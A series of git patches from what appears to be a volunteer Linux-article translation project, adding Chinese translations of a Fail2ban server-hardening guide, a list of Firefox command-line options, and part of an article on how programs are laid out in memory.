via: https://www.infoworld.com/article/3176488/linux/a-beginner-s-guide-to-raspberry-pi-3.html
作者:[Swapnil Bhartiya][a]
-译者:[译者ID](https://github.com/译者ID)
+译者:[qhwdw](https://github.com/qhwdw)
校对:[校对者ID](https://github.com/校对者ID)
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
From 2ff11dc5b77ed2b31fedc56d713f46b315865b3a Mon Sep 17 00:00:00 2001
From: qhwdw
Date: Thu, 11 Jan 2018 11:13:39 +0800
Subject: [PATCH 230/371] Translating by qhwdw
---
sources/tech/20090127 Anatomy of a Program in Memory.md | 1 +
1 file changed, 1 insertion(+)
diff --git a/sources/tech/20090127 Anatomy of a Program in Memory.md b/sources/tech/20090127 Anatomy of a Program in Memory.md
index fff0818491..56979709bb 100644
--- a/sources/tech/20090127 Anatomy of a Program in Memory.md
+++ b/sources/tech/20090127 Anatomy of a Program in Memory.md
@@ -1,3 +1,4 @@
+Translating by qhwdw
Anatomy of a Program in Memory
============================================================
From 5f54d1eedc784fc4c2045e3190a8caa8ad7ca3c1 Mon Sep 17 00:00:00 2001
From: Flowsnow
Date: Thu, 11 Jan 2018 11:37:50 +0800
Subject: [PATCH 231/371] =?UTF-8?q?=E7=BF=BB=E8=AF=91=E5=AE=8C=E6=88=90-/2?=
=?UTF-8?q?0171107=20How=20To=20Protect=20Server=20Against=20Brute=20Force?=
=?UTF-8?q?=20Attacks=20With=20Fail2ban=20On=20Linux.md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...te Force Attacks With Fail2ban On Linux.md | 101 ++++++++----------
1 file changed, 47 insertions(+), 54 deletions(-)
rename {sources => translated}/tech/20171107 How To Protect Server Against Brute Force Attacks With Fail2ban On Linux.md (57%)
diff --git a/sources/tech/20171107 How To Protect Server Against Brute Force Attacks With Fail2ban On Linux.md b/translated/tech/20171107 How To Protect Server Against Brute Force Attacks With Fail2ban On Linux.md
similarity index 57%
rename from sources/tech/20171107 How To Protect Server Against Brute Force Attacks With Fail2ban On Linux.md
rename to translated/tech/20171107 How To Protect Server Against Brute Force Attacks With Fail2ban On Linux.md
index 55e7a7d17a..1d90ea333c 100644
--- a/sources/tech/20171107 How To Protect Server Against Brute Force Attacks With Fail2ban On Linux.md
+++ b/translated/tech/20171107 How To Protect Server Against Brute Force Attacks With Fail2ban On Linux.md
@@ -1,67 +1,65 @@
-translating by Flowsnow
-
-How To Protect Server Against Brute Force Attacks With Fail2ban On Linux
+如何在Linux上用Fail2ban保护服务器免受暴力攻击
======
-One of the important task for Linux administrator is to protect server against illegitimate attack or access. By default Linux system comes with well-configured firewall such as Iptables, Uncomplicated Firewall (UFW), ConfigServer Security Firewall (CSF), etc, which will prevent many kinds of attacks.
+Linux管理员的一个重要任务是保护服务器免受非法攻击或访问。 默认情况下,Linux系统带有配置良好的防火墙,比如Iptables,Uncomplicated Firewall(UFW),ConfigServer Security Firewall(CSF)等,可以防止多种攻击。
-Any machine which is connected to the internet is a potential target for malicious attacks. There is a tool called fail2ban is available to mitigate illegitimate access on server.
+任何连接到互联网的机器都是恶意攻击的潜在目标。 有一个名为fail2ban的工具可用来缓解服务器上的非法访问。
-### What Is Fail2ban?
+### 什么是Fail2ban?
-[Fail2ban][1] is an intrusion prevention software, framework which protect server against brute force attacks. It's Written in Python programming language. Fail2ban work based on auth log files, by default it will scan the auth log files such as `/var/log/auth.log`, `/var/log/apache/access.log`, etc.. and bans IPs that show the malicious signs, too many password failures, seeking for exploits, etc.
+[Fail2ban][1] 是一款入侵防御软件(框架),可以保护服务器免受暴力破解攻击。它使用 Python 编写。Fail2ban 基于认证日志文件工作,默认情况下它会扫描 `/var/log/auth.log`、`/var/log/apache/access.log` 等认证日志,并封禁表现出恶意迹象的 IP,比如密码错误次数过多、尝试寻找漏洞利用等。
-Generally fail2Ban is used to update firewall rules to reject the IP addresses for a specified amount of time. Also it will send mail notification too. Fail2Ban comes with many filters for various services such as ssh, apache, nginx, squid, named, mysql, nagios, etc,.
+通常,fail2Ban用于更新防火墙规则,用于在指定的时间内拒绝IP地址。 它也会发送邮件通知。 Fail2Ban为各种服务提供了许多过滤器,如ssh,apache,nginx,squid,named,mysql,nagios等。
-Fail2Ban is able to reduce the rate of incorrect authentications attempts however it cannot eliminate the risk that weak authentication presents. this is one of the security for server which will prevent brute force attacks.
+Fail2Ban能够降低错误认证尝试的速度,但是它不能消除弱认证带来的风险。 这只是服务器防止暴力攻击的安全手段之一。
-### How to Install Fail2ban In Linux
+### 如何在Linux中安装Fail2ban
-Fail2ban is already packaged with most of the Linux distribution so, just use you distribution package manager to install it.
+Fail2ban 已经打包进了大部分 Linux 发行版,所以只需使用你的发行版的包管理器来安装它。
+
+对于**`Debian / Ubuntu`**,使用[APT-GET命令][2]或[APT命令][3]安装。
-For **`Debian/Ubuntu`** , use [APT-GET Command][2] or [APT Command][3] to install tilda.
```
$ sudo apt install fail2ban
-
```
-For **`Fedora`** , use [DNF Command][4] to install tilda.
+对于**`Fedora`**,使用[DNF命令][4]安装。
+
```
$ sudo dnf install fail2ban
-
```
-For **`CentOS/RHEL`** systems, enable [EPEL Repository][5] or [RPMForge Repository][6] and use [YUM Command][7] to install Terminator.
+对于 **`CentOS/RHEL`**,启用[EPEL库][5]或[RPMForge][6]库,使用[YUM命令][7]安装。
+
```
$ sudo yum install fail2ban
-
```
-For **`Arch Linux`** , use [Pacman Command][8] to install tilda.
+对于**`Arch Linux`**,使用[Pacman命令][8]安装。
+
```
$ sudo pacman -S fail2ban
-
```
-For **`openSUSE`** , use [Zypper Command][9] to install tilda.
+对于 **`openSUSE`** , 使用[Zypper命令][9]安装.
```
$ sudo zypper in fail2ban
-
```
-### How To Configure Fail2ban
+### 如何配置Fail2ban
-By default Fail2ban keeps all the configuration files in `/etc/fail2ban/` directory. The main configuration file is `jail.conf`, it contains a set of pre-defined filters. So, don't edit the file and it's not advisable because whenever new update comes the configuration get reset to default.
+默认情况下,Fail2ban 将所有配置文件保存在 `/etc/fail2ban/` 目录中。主配置文件是 `jail.conf`,它包含一组预定义的过滤器。不建议直接编辑这个文件,因为每当软件更新时,其中的配置都会被重置为默认值。
+
+只需在同一目录下创建一个名为 `jail.local` 的新配置文件,然后按照你的需要进行修改即可。
-Just create a new configuration file called `jail.local` in the same directory and modify as per your wish.
```
# cp /etc/fail2ban/jail.conf /etc/fail2ban/jail.local
-
```
-By default most of the option was configured perfectly and if you want to enable access to any particular IP then you can add the IP address into `ignoreip` area, for more then one IP give a speace between the IP address.
+默认情况下,大多数选项都已经配置得很好了。如果想允许某些特定 IP 的访问,可以把这些 IP 地址添加到 `ignoreip` 中;多个 IP 之间用空格隔开。
+
+配置文件中的 `DEFAULT` 部分包含 Fail2Ban 遵循的基本规则集,你可以按需调整其中的任何参数(参数含义见下方列表,列表之后附有一个示例)。
-The `DEFAULT` section contains the basic set of rules that Fail2Ban follow and you can adjust any parameter as per your wish.
```
# nano /etc/fail2ban/jail.local
@@ -71,19 +69,19 @@ bantime = 600
findtime = 600
maxretry = 3
destemail = 2daygeek@gmail.com
-
```
- * **ignoreip :** This section allow us to whitelist the list of IP address and Fail2ban will not ban a host which matches an address in this list
- * **bantime :** The number of seconds that a host is banned
- * **findtime :** A host is banned if it has generated "maxretry" during the last "findtime" seconds
- * **maxretry :** "maxretry" is the number of failures before a host get banned.
+ * **ignoreip:** 白名单 IP 地址列表,Fail2ban 不会封禁与列表中地址匹配的主机
+ * **bantime:** 主机被封禁的秒数
+ * **findtime:** 如果主机在最近 findtime 秒内产生了 maxretry 次失败,就会被封禁
+ * **maxretry:** 主机被封禁之前允许的失败次数
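+
+除了复制整份 `jail.conf` 之外,另一种常见做法(下面只是一个示意,参数值和 IP 段均为示例)是创建一个只包含需要覆盖的参数的 `jail.local`:
+```
+sudo tee /etc/fail2ban/jail.local > /dev/null <<'EOF'
+[DEFAULT]
+ignoreip = 127.0.0.1/8 192.168.1.0/24
+bantime  = 600
+findtime = 600
+maxretry = 3
+EOF
+```
+Fail2ban 会先读取 `jail.conf`,再用 `jail.local` 中的同名参数覆盖,所以这个文件可以很短。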
-### How To Configure Service
+### 如何配置服务
+
+Fail2ban 为 ssh、apache、nginx、squid、named、mysql、nagios 等各种服务提供了一组预定义的过滤器。我们不需要对配置文件做太多更改,只需在对应服务的区域中加入 `enabled = true` 这一行,就可以为该服务启用监狱(jail);把 true 改为 false 即可禁用(可参考本节末尾的示例)。
-Fail2ban comes with set of pre-defined filters for various servicess such as ssh, apache, nginx, squid, named, mysql, nagios, etc,. We don't want to make any changes on configuration file and just add following line `enabled = true` in the service area to enable jail to any services. To disable make the line to `false` instead of ture.
```
# SSH servers
[sshd]
@@ -91,31 +89,29 @@ enabled = true
port = ssh
logpath = %(sshd_log)s
backend = %(sshd_backend)s
-
```
- * **enabled :** Determines whether the service is turned on or off.
- * **port :** It's refering to the particular service. If using the default port, then the service name can be placed here. If using a non-traditional port, this should be the port number.
- * **logpath :** Gives the location of the service's logs./li>
- * **backend :** "backend" specifies the backend used to get files modification.
+ * **enabled:** 决定该监狱是启用还是关闭
+ * **port:** 对应服务的端口。如果使用默认端口,这里可以填写服务名称;如果使用非标准端口,则应填写端口号
+ * **logpath:** 该服务日志文件的位置
+ * **backend:** 指定用于获取文件修改事件的后端
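+
+下面是一个写入示意(监狱名沿用上文的 sshd,端口与日志路径使用默认宏;写入后按下一节的方法重启 Fail2Ban 即可生效):
+```
+sudo tee -a /etc/fail2ban/jail.local > /dev/null <<'EOF'
+
+[sshd]
+enabled = true
+port    = ssh
+logpath = %(sshd_log)s
+backend = %(sshd_backend)s
+EOF
+```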
-### Restart Fail2Ban
+### 重启Fail2Ban
-After making changes restart Fail2Ban to take effect.
+进行更改后,重新启动Fail2Ban才能生效。
```
[For SysVinit Systems]
# service fail2ban restart
[For systemd Systems]
# systemctl restart fail2ban.service
-
```
-### Verify Fail2Ban iptables rules
+### 验证Fail2Ban iptables规则
-You can confirm whether Fail2Ban iptables rules are added into firewall using below command.
+你可以使用下面的命令来确认是否在防火墙中成功添加了Fail2Ban iptables规则。
```
# iptables -L
Chain INPUT (policy ACCEPT)
@@ -139,9 +135,10 @@ target prot opt source destination
RETURN all -- anywhere anywhere
```
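+
+如果输出太长,也可以只过滤出 Fail2Ban 相关的链和规则(链名随版本不同可能是 `f2b-<监狱名>` 或 `fail2ban-<监狱名>`,下面只是一个示意):
+```
+# 只查看 Fail2Ban 创建的链和规则
+sudo iptables -S | grep -iE 'f2b|fail2ban'
+```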
-### How To Test Fail2ban
+### 如何测试Fail2ban
+
+为了测试,我故意进行了几次失败的登录尝试。为了确认封禁是否生效,我查看了 `/var/log/fail2ban.log` 文件。
-I have made some failed attempts to test this. To confirm this, I'm going to verify the `/var/log/fail2ban.log` file.
```
2017-11-05 14:43:22,901 fail2ban.server [7141]: INFO Changed logging target to /var/log/fail2ban.log for Fail2ban v0.9.6
2017-11-05 14:43:22,987 fail2ban.database [7141]: INFO Connected to fail2ban persistent database '/var/lib/fail2ban/fail2ban.sqlite3'
@@ -184,19 +181,17 @@ I have made some failed attempts to test this. To confirm this, I'm going to ver
2017-11-05 15:20:12,276 fail2ban.filter [8528]: INFO [sshd] Found 103.5.134.167
2017-11-05 15:20:12,380 fail2ban.actions [8528]: NOTICE [sshd] Ban 103.5.134.167
2017-11-05 15:21:12,659 fail2ban.actions [8528]: NOTICE [sshd] Unban 103.5.134.167
-
```
-To Check list of jail enabled, run the following command.
+要查看启用的监狱列表,请运行以下命令。
```
# fail2ban-client status
Status
|- Number of jail: 2
`- Jail list: apache-auth, sshd
-
```
-To get the blocked Ip address by running following command.
+要查看被封禁的 IP 地址,请运行以下命令。
```
# fail2ban-client status ssh
Status for the jail: ssh
@@ -208,13 +203,11 @@ Status for the jail: ssh
|- Currently banned: 1
| `- IP list: 192.168.1.115
`- Total banned: 1
-
```
-To remove blocked IP address from Fail2Ban, run the following command.
+要从 Fail2Ban 中解封某个被禁止的 IP 地址,请运行以下命令。
```
# fail2ban-client set ssh unbanip 192.168.1.115
-
```
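+
+反过来,也可以用 `fail2ban-client` 手动封禁某个 IP(下面的监狱名 sshd 和 IP 只是示例):
+```
+# 手动封禁与解封一个 IP
+fail2ban-client set sshd banip 203.0.113.10
+fail2ban-client set sshd unbanip 203.0.113.10
+```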
--------------------------------------------------------------------------------
@@ -222,7 +215,7 @@ To remove blocked IP address from Fail2Ban, run the following command.
via: https://www.2daygeek.com/how-to-install-setup-configure-fail2ban-on-linux/#
作者:[Magesh Maruthamuthu][a]
-译者:[译者ID](https://github.com/译者ID)
+译者:[Flowsnow](https://github.com/Flowsnow)
校对:[校对者ID](https://github.com/校对者ID)
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
From e215356c4ad11c1684a613ed07093e1b6d4674cb Mon Sep 17 00:00:00 2001
From: hopefully2333 <787016457@qq.com>
Date: Thu, 11 Jan 2018 11:43:01 +0800
Subject: [PATCH 232/371] Update 20180106 Meltdown and Spectre Linux Kernel
Status.md
---
.../tech/20180106 Meltdown and Spectre Linux Kernel Status.md | 2 ++
1 file changed, 2 insertions(+)
diff --git a/sources/tech/20180106 Meltdown and Spectre Linux Kernel Status.md b/sources/tech/20180106 Meltdown and Spectre Linux Kernel Status.md
index 1ade61bd3a..d98fddad78 100644
--- a/sources/tech/20180106 Meltdown and Spectre Linux Kernel Status.md
+++ b/sources/tech/20180106 Meltdown and Spectre Linux Kernel Status.md
@@ -1,3 +1,5 @@
+translated by hopefully2333
+
Meltdown and Spectre Linux Kernel Status
============================================================
From e7d2f183a73dce5060c734576863095bfc2ba146 Mon Sep 17 00:00:00 2001
From: syys96 <3359652182@qq.com>
Date: Wed, 10 Jan 2018 23:26:28 -0500
Subject: [PATCH 233/371] Update 20170123 New Years resolution Donate to 1 free
software project every month.md
---
... resolution Donate to 1 free software project every month.md | 2 ++
1 file changed, 2 insertions(+)
diff --git a/sources/tech/20170123 New Years resolution Donate to 1 free software project every month.md b/sources/tech/20170123 New Years resolution Donate to 1 free software project every month.md
index d2e2b5f5c1..53ee20dbd3 100644
--- a/sources/tech/20170123 New Years resolution Donate to 1 free software project every month.md
+++ b/sources/tech/20170123 New Years resolution Donate to 1 free software project every month.md
@@ -1,3 +1,5 @@
+Translating by syys96
+
New Year’s resolution: Donate to 1 free software project every month
============================================================
From 427289a40bcdbb324a855b68f06e956bec951d11 Mon Sep 17 00:00:00 2001
From: Flowsnow
Date: Thu, 11 Jan 2018 13:51:31 +0800
Subject: [PATCH 234/371] =?UTF-8?q?=E7=94=B3=E8=AF=B7=E7=BF=BB=E8=AF=91-20?=
=?UTF-8?q?170919=20What=20Are=20Bitcoins.md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
sources/tech/20170919 What Are Bitcoins.md | 5 ++++-
1 file changed, 4 insertions(+), 1 deletion(-)
diff --git a/sources/tech/20170919 What Are Bitcoins.md b/sources/tech/20170919 What Are Bitcoins.md
index 35ff986891..c61b32b76a 100644
--- a/sources/tech/20170919 What Are Bitcoins.md
+++ b/sources/tech/20170919 What Are Bitcoins.md
@@ -1,7 +1,10 @@
+translating by Flowsnow
+
What Are Bitcoins?
======
+
![what are bitcoins](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/what-are-bitcoins_orig.jpg)
-
+
**[Bitcoin][1]** is a digital currency or electronic cash the relies on peer to peer technology for completing transactions. Since peer to peer technology is used as the major network, bitcoins provide a community like managed economy. This is to mean, bitcoins eliminate the centralized authority way of managing currency and promotes community management of currency. Most Also of the software related to bitcoin mining and managing of bitcoin digital cash is open source.
The first Bitcoin software was developed by Satoshi Nakamoto and it's based on open source cryptographic protocol. Bitcoins smallest unit is known as the Satoshi which is basically one-hundredth millionth of a single bitcoin (0.00000001 BTC).
From ca9f406cb9f2a919836dd3330cd4d7fb0e42dc10 Mon Sep 17 00:00:00 2001
From: darksun
Date: Thu, 11 Jan 2018 14:20:44 +0800
Subject: [PATCH 235/371] translate done: 20171008 The most important Firefox
command line options.md
---
... important Firefox command line options.md | 61 -------------------
... important Firefox command line options.md | 58 ++++++++++++++++++
2 files changed, 58 insertions(+), 61 deletions(-)
delete mode 100644 sources/tech/20171008 The most important Firefox command line options.md
create mode 100644 translated/tech/20171008 The most important Firefox command line options.md
diff --git a/sources/tech/20171008 The most important Firefox command line options.md b/sources/tech/20171008 The most important Firefox command line options.md
deleted file mode 100644
index 8190be8340..0000000000
--- a/sources/tech/20171008 The most important Firefox command line options.md
+++ /dev/null
@@ -1,61 +0,0 @@
-translating by lujun9972
-The most important Firefox command line options
-======
-The Firefox web browser supports a number of command line options that it can be run with to customize startup of the web browser.
-
-You may have come upon some of them in the past, for instance the command -P "profile name" to start the browser with the specified profile, or -private to start a new private browsing session.
-
-The following guide lists important command line options for Firefox. It is not a complete list of all available options, as many are used only for specific purposes that have little to no value to users of the browser.
-
-You find the [complete][1] listing of command line options on the Firefox Developer website. Note that many of the command line options work in other Mozilla-based products, even third-party programs, as well.
-
-### Important Firefox command line options
-
-![firefox command line][2]
-
- **Profile specific options**
-
- * **-CreateProfile profile name** -- This creates a new user profile, but won't start it right away.
- * **-CreateProfile "profile name profile dir"** -- Same as above, but will specify a custom profile directory on top of that.
- * **-ProfileManager** , or **-P** -- Opens the built-in profile manager.
- * - **P "profile name"** -- Starts Firefox with the specified profile. Profile manager is opened if the specified profile does not exist. Works only if no other instance of Firefox is running.
- * **-no-remote** -- Add this to the -P commands to create a new instance of the browser. This lets you run multiple profiles at the same time.
-
-
-
- **Browser specific options**
-
- * **-headless** -- Start Firefox in headless mode. Requires Firefox 55 on Linux, Firefox 56 on Windows and Mac OS X.
- * **-new-tab URL** -- loads the specified URL in a new tab in Firefox.
- * **-new-window URL** -- loads the specified URL in a new Firefox window.
- * **-private** -- Launches Firefox in private browsing mode. Can be used to run Firefox in private browsing mode all the time.
- * **-private-window** -- Open a private window.
- * **-private-window URL** -- Open the URL in a new private window. If a private browsing window is open already, open the URL in that window instead.
- * **-search term** -- Run the search using the default Firefox search engine.
- * - **url URL** -- Load the URL in a new tab or window. Can be run without -url, and multiple URLs separated by space can be opened using the command.
-
-
-
-Other options
-
- * **-safe-mode** -- Starts Firefox in Safe Mode. You may also hold down the Shift-key while opening Firefox to start the browser in Safe Mode.
- * **-devtools** -- Start Firefox with Developer Tools loaded and open.
- * **-inspector URL** -- Inspect the specified address in the DOM Inspector.
- * **-jsconsole** -- Start Firefox with the Browser Console.
- * **-tray** -- Start Firefox minimized.
-
-
-
-
---------------------------------------------------------------------------------
-
-via: https://www.ghacks.net/2017/10/08/the-most-important-firefox-command-line-options/
-
-作者:[Martin Brinkmann][a]
-译者:[lujun9972](https://github.com/lujun9972)
-校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
-
-[a]:https://www.ghacks.net/author/martin/
-[1]:https://developer.mozilla.org/en-US/docs/Mozilla/Command_Line_Options
diff --git a/translated/tech/20171008 The most important Firefox command line options.md b/translated/tech/20171008 The most important Firefox command line options.md
new file mode 100644
index 0000000000..14daac06cb
--- /dev/null
+++ b/translated/tech/20171008 The most important Firefox command line options.md
@@ -0,0 +1,58 @@
+最重要的 Firefox 命令行选项
+======
+Firefox web 浏览器支持很多命令行选项,可以定制它启动的方式。
+
+你可能已经接触过一些了,比如 `-P "profile name"` 指定浏览器启动加载时的配置文件,`-private` 开启一个私有会话。
+
+本指南会列出对 Firefox 来说比较重要的那些命令行选项。它并不包含所有的可选项,因为很多选项只用于特定的目的,对一般用户来说没什么价值。
+
+你可以在 Firefox 开发者网站上看到[完整][1]的命令行选项列表。需要注意的是,很多命令行选项对其他基于 Mozilla 的产品同样有效,甚至对某些第三方程序也有效。
+
+### 重要的 Firefox 命令行选项
+
+![firefox command line][2]
+
+#### Profile 相关选项
+
+ + **-CreateProfile profile 名称** -- 创建新的用户配置文件(profile),但并不立即使用它。
+ + **-CreateProfile "profile 名 存放 profile 的目录"** -- 跟上面一样,只是额外指定了存放 profile 的目录。
+ + **-ProfileManager**,或 **-P** -- 打开内置的 profile 管理器。
+ + **-P "profile 名"** -- 使用指定的 profile 启动 Firefox。若指定的 profile 不存在则会打开 profile 管理器。只有在没有其他 Firefox 实例运行时才有效。
+ + **-no-remote** -- 与 `-P` 连用来创建新的浏览器实例。它允许你同时运行多个 profile。
+
+#### 浏览器相关选项
+
+ + **-headless** -- 以无头模式启动 Firefox。Linux 上需要 Firefox 55 及以上,Windows 和 Mac OS X 上需要 Firefox 56 及以上。
+ + **-new-tab URL** -- 在 Firefox 的新标签页中加载指定 URL。
+ + **-new-window URL** -- 在 Firefox 的新窗口中加载指定 URL。
+ + **-private** -- 以隐私浏览模式启动 Firefox。可以用来让 Firefox 始终运行在隐私浏览模式下。
+ + **-private-window** -- 打开一个隐私窗口。
+ + **-private-window URL** -- 在新的隐私窗口中打开 URL。若已经打开了一个隐私浏览窗口,则在那个窗口中打开 URL。
+ + **-search 关键词** -- 使用 Firefox 默认的搜索引擎进行搜索。
+ + **-url URL** -- 在新的标签页或窗口中加载 URL。`-url` 可以省略,而且可以一次打开多个 URL,URL 之间用空格分隔。
+
+
+
+#### 其他选项
+
+ + **-safe-mode** -- 在安全模式下启动 Firefox。在启动 Firefox 时一直按住 Shift 键也能进入安全模式。
+ + **-devtools** -- 启动 Firefox,同时加载并打开 Developer Tools。
+ + **-inspector URL** -- 使用 DOM Inspector 查看指定的 URL
+ + **-jsconsole** -- 启动 Firefox,同时打开 Browser Console。
+ + **-tray** -- 启动 Firefox,但保持最小化。
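+
+下面把上述几个选项组合成几个示例命令(profile 名称与 URL 仅为示意):
+```
+# 创建一个新的 profile,并用它单独启动一个浏览器实例
+firefox -CreateProfile test
+firefox -P test -no-remote
+# 在新的隐私窗口中打开指定 URL
+firefox -private-window https://example.com
+# 以无头模式启动(Linux 上需要 Firefox 55 及以上)
+firefox -headless
+```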
+
+
+
+
+--------------------------------------------------------------------------------
+
+via: https://www.ghacks.net/2017/10/08/the-most-important-firefox-command-line-options/
+
+作者:[Martin Brinkmann][a]
+译者:[lujun9972](https://github.com/lujun9972)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://www.ghacks.net/author/martin/
+[1]:https://developer.mozilla.org/en-US/docs/Mozilla/Command_Line_Options
From 66700a9c745e853eb8a0be859d251ccba868d90b Mon Sep 17 00:00:00 2001
From: qhwdw
Date: Thu, 11 Jan 2018 14:51:45 +0800
Subject: [PATCH 236/371] Translated by qhwdw
---
...20090127 Anatomy of a Program in Memory.md | 85 -------------------
...20090127 Anatomy of a Program in Memory.md | 84 ++++++++++++++++++
2 files changed, 84 insertions(+), 85 deletions(-)
delete mode 100644 sources/tech/20090127 Anatomy of a Program in Memory.md
create mode 100644 translated/tech/20090127 Anatomy of a Program in Memory.md
diff --git a/sources/tech/20090127 Anatomy of a Program in Memory.md b/sources/tech/20090127 Anatomy of a Program in Memory.md
deleted file mode 100644
index 56979709bb..0000000000
--- a/sources/tech/20090127 Anatomy of a Program in Memory.md
+++ /dev/null
@@ -1,85 +0,0 @@
-Translating by qhwdw
-Anatomy of a Program in Memory
-============================================================
-
-Memory management is the heart of operating systems; it is crucial for both programming and system administration. In the next few posts I’ll cover memory with an eye towards practical aspects, but without shying away from internals. While the concepts are generic, examples are mostly from Linux and Windows on 32-bit x86\. This first post describes how programs are laid out in memory.
-
-Each process in a multi-tasking OS runs in its own memory sandbox. This sandbox is the virtual address space, which in 32-bit mode is always a 4GB block of memory addresses. These virtual addresses are mapped to physical memory by page tables, which are maintained by the operating system kernel and consulted by the processor. Each process has its own set of page tables, but there is a catch. Once virtual addresses are enabled, they apply to _all software_ running in the machine, _including the kernel itself_ . Thus a portion of the virtual address space must be reserved to the kernel:
-
-![Kernel/User Memory Split](http://static.duartes.org/img/blogPosts/kernelUserMemorySplit.png)
-
-This does not mean the kernel uses that much physical memory, only that it has that portion of address space available to map whatever physical memory it wishes. Kernel space is flagged in the page tables as exclusive to [privileged code][1] (ring 2 or lower), hence a page fault is triggered if user-mode programs try to touch it. In Linux, kernel space is constantly present and maps the same physical memory in all processes. Kernel code and data are always addressable, ready to handle interrupts or system calls at any time. By contrast, the mapping for the user-mode portion of the address space changes whenever a process switch happens:
-
-![Process Switch Effects on Virtual Memory](http://static.duartes.org/img/blogPosts/virtualMemoryInProcessSwitch.png)
-
-Blue regions represent virtual addresses that are mapped to physical memory, whereas white regions are unmapped. In the example above, Firefox has used far more of its virtual address space due to its legendary memory hunger. The distinct bands in the address space correspond to memory segments like the heap, stack, and so on. Keep in mind these segments are simply a range of memory addresses and _have nothing to do_ with [Intel-style segments][2]. Anyway, here is the standard segment layout in a Linux process:
-
-![Flexible Process Address Space Layout In Linux](http://static.duartes.org/img/blogPosts/linuxFlexibleAddressSpaceLayout.png)
-
-When computing was happy and safe and cuddly, the starting virtual addresses for the segments shown above were exactly the same for nearly every process in a machine. This made it easy to exploit security vulnerabilities remotely. An exploit often needs to reference absolute memory locations: an address on the stack, the address for a library function, etc. Remote attackers must choose this location blindly, counting on the fact that address spaces are all the same. When they are, people get pwned. Thus address space randomization has become popular. Linux randomizes the [stack][3], [memory mapping segment][4], and [heap][5] by adding offsets to their starting addresses. Unfortunately the 32-bit address space is pretty tight, leaving little room for randomization and [hampering its effectiveness][6].
-
-The topmost segment in the process address space is the stack, which stores local variables and function parameters in most programming languages. Calling a method or function pushes a new stack frame onto the stack. The stack frame is destroyed when the function returns. This simple design, possible because the data obeys strict [LIFO][7] order, means that no complex data structure is needed to track stack contents – a simple pointer to the top of the stack will do. Pushing and popping are thus very fast and deterministic. Also, the constant reuse of stack regions tends to keep active stack memory in the [cpu caches][8], speeding up access. Each thread in a process gets its own stack.
-
-It is possible to exhaust the area mapping the stack by pushing more data than it can fit. This triggers a page fault that is handled in Linux by [expand_stack()][9], which in turn calls [acct_stack_growth()][10] to check whether it’s appropriate to grow the stack. If the stack size is below RLIMIT_STACK (usually 8MB), then normally the stack grows and the program continues merrily, unaware of what just happened. This is the normal mechanism whereby stack size adjusts to demand. However, if the maximum stack size has been reached, we have a stack overflow and the program receives a Segmentation Fault. While the mapped stack area expands to meet demand, it does not shrink back when the stack gets smaller. Like the federal budget, it only expands.
-
-Dynamic stack growth is the [only situation][11] in which access to an unmapped memory region, shown in white above, might be valid. Any other access to unmapped memory triggers a page fault that results in a Segmentation Fault. Some mapped areas are read-only, hence write attempts to these areas also lead to segfaults.
-
-Below the stack, we have the memory mapping segment. Here the kernel maps contents of files directly to memory. Any application can ask for such a mapping via the Linux [mmap()][12] system call ([implementation][13]) or [CreateFileMapping()][14] / [MapViewOfFile()][15] in Windows. Memory mapping is a convenient and high-performance way to do file I/O, so it is used for loading dynamic libraries. It is also possible to create an anonymous memory mapping that does not correspond to any files, being used instead for program data. In Linux, if you request a large block of memory via [malloc()][16], the C library will create such an anonymous mapping instead of using heap memory. ‘Large’ means larger than MMAP_THRESHOLD bytes, 128 kB by default and adjustable via [mallopt()][17].
-
-Speaking of the heap, it comes next in our plunge into address space. The heap provides runtime memory allocation, like the stack, meant for data that must outlive the function doing the allocation, unlike the stack. Most languages provide heap management to programs. Satisfying memory requests is thus a joint affair between the language runtime and the kernel. In C, the interface to heap allocation is [malloc()][18] and friends, whereas in a garbage-collected language like C# the interface is the new keyword.
-
-If there is enough space in the heap to satisfy a memory request, it can be handled by the language runtime without kernel involvement. Otherwise the heap is enlarged via the [brk()][19]system call ([implementation][20]) to make room for the requested block. Heap management is [complex][21], requiring sophisticated algorithms that strive for speed and efficient memory usage in the face of our programs’ chaotic allocation patterns. The time needed to service a heap request can vary substantially. Real-time systems have [special-purpose allocators][22] to deal with this problem. Heaps also become _fragmented_ , shown below:
-
-![Fragmented Heap](http://static.duartes.org/img/blogPosts/fragmentedHeap.png)
-
-Finally, we get to the lowest segments of memory: BSS, data, and program text. Both BSS and data store contents for static (global) variables in C. The difference is that BSS stores the contents of _uninitialized_ static variables, whose values are not set by the programmer in source code. The BSS memory area is anonymous: it does not map any file. If you say static int cntActiveUsers, the contents of cntActiveUsers live in the BSS.
-
-The data segment, on the other hand, holds the contents for static variables initialized in source code. This memory area is not anonymous. It maps the part of the program’s binary image that contains the initial static values given in source code. So if you say static int cntWorkerBees = 10, the contents of cntWorkerBees live in the data segment and start out as 10\. Even though the data segment maps a file, it is a private memory mapping, which means that updates to memory are not reflected in the underlying file. This must be the case, otherwise assignments to global variables would change your on-disk binary image. Inconceivable!
-
-The data example in the diagram is trickier because it uses a pointer. In that case, the _contents_ of pointer gonzo – a 4-byte memory address – live in the data segment. The actual string it points to does not, however. The string lives in the text segment, which is read-only and stores all of your code in addition to tidbits like string literals. The text segment also maps your binary file in memory, but writes to this area earn your program a Segmentation Fault. This helps prevent pointer bugs, though not as effectively as avoiding C in the first place. Here’s a diagram showing these segments and our example variables:
-
-![ELF Binary Image Mapped Into Memory](http://static.duartes.org/img/blogPosts/mappingBinaryImage.png)
-
-You can examine the memory areas in a Linux process by reading the file /proc/pid_of_process/maps. Keep in mind that a segment may contain many areas. For example, each memory mapped file normally has its own area in the mmap segment, and dynamic libraries have extra areas similar to BSS and data. The next post will clarify what ‘area’ really means. Also, sometimes people say “data segment” meaning all of data + bss + heap.
-
